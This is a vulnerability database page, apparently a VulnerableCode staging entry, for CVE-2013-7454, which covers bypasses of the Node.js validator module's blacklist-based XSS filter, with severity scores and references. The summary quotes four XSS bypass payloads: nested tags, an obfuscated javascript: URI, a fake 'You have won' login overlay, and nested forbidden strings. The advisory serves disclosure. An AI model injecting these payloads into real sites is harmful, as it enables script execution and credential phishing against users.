Staging Environment: Content and features may be unstable or change without notice.
Search for vulnerabilities
Vulnerability details: VCID-e5x8-jpa7-kqfx
Vulnerability ID VCID-e5x8-jpa7-kqfx
Aliases CVE-2013-7454
GHSA-q4qq-fm7q-cwp5
Summary Multiple XSS Filter Bypasses The validator module for Node.js contains functionality meant to filter potential XSS attacks (a filter called xss). Several ways to bypass the filter were discovered. In general, because the function’s filtering is blacklist-based it is likely that other bypasses will be discovered in the future. Developers are encouraged not to use the xss filter function in this package. ### Details: Various inputs that could bypass the filter were discovered: Improper parsing of nested tags: ``` <s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s> ``` Incomplete filtering of javascript: URIs: ``` <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> ``` UI Redressing: ``` <div style="z-index: 9999999; background-color: green; width: 100%; height: 100%"> <h1>You have won</h1>Please click the link and enter your login details: <a href="http://example.com/">http://good.com</a> </div> ``` Bypass via Nested Forbidden Strings: ``` <scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt> ``` Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, which this code was based off of.
Status Published
Exploitability 0.5
Weighted Severity 6.2
Risk 3.1
Affected and Fixed Packages Package Details
Weaknesses (3)
CWE-1035 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-937 OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
System Score Found at
cvssv3.1 6.1 http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
generic_textual MODERATE http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
cvssv3 6.5 http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html)
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
epss 0.00482 https://api.first.org/data/v1/epss?cve=CVE-2013-7454
cvssv3.1 6.1 https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
cvssv3.1_qr MODERATE https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
generic_textual MODERATE https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
cvssv3 6.5 https://github.com/nodejs/security-wg/blob/main/vuln/npm/41.json
cvssv3.1 6.1 https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
generic_textual MODERATE https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
cvssv3 6.5 https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module/)
cvssv3.1 6.1 https://nvd.nist.gov/vuln/detail/CVE-2013-7454
generic_textual MODERATE https://nvd.nist.gov/vuln/detail/CVE-2013-7454
cvssv3.1 6.1 https://www.npmjs.com/advisories/41
generic_textual MODERATE https://www.npmjs.com/advisories/41
cvssv3.1 6.1 http://www.openwall.com/lists/oss-security/2016/04/20/11
generic_textual MODERATE http://www.openwall.com/lists/oss-security/2016/04/20/11
Reference id Reference type URL
http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html)
https://api.first.org/data/v1/epss?cve=CVE-2013-7454
https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module/
https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module/)
https://nodesecurity.io/advisories/41
https://www.npmjs.com/advisories/41
http://www.openwall.com/lists/oss-security/2016/04/20/11
41 https://github.com/nodejs/security-wg/blob/main/vuln/npm/41.json
CVE-2013-7454 https://nvd.nist.gov/vuln/detail/CVE-2013-7454
GHSA-q4qq-fm7q-cwp5 https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
No exploits are available.
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://nvd.nist.gov/vuln/detail/CVE-2013-7454
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://www.npmjs.com/advisories/41
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at http://www.openwall.com/lists/oss-security/2016/04/20/11
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Exploit Prediction Scoring System (EPSS)
Percentile 0.65512
EPSS Score 0.00482
Published At June 4, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-06-02T03:45:02.054934+00:00 Npm Importer Import https://github.com/nodejs/security-wg/blob/main/vuln/npm/41.json 38.6.0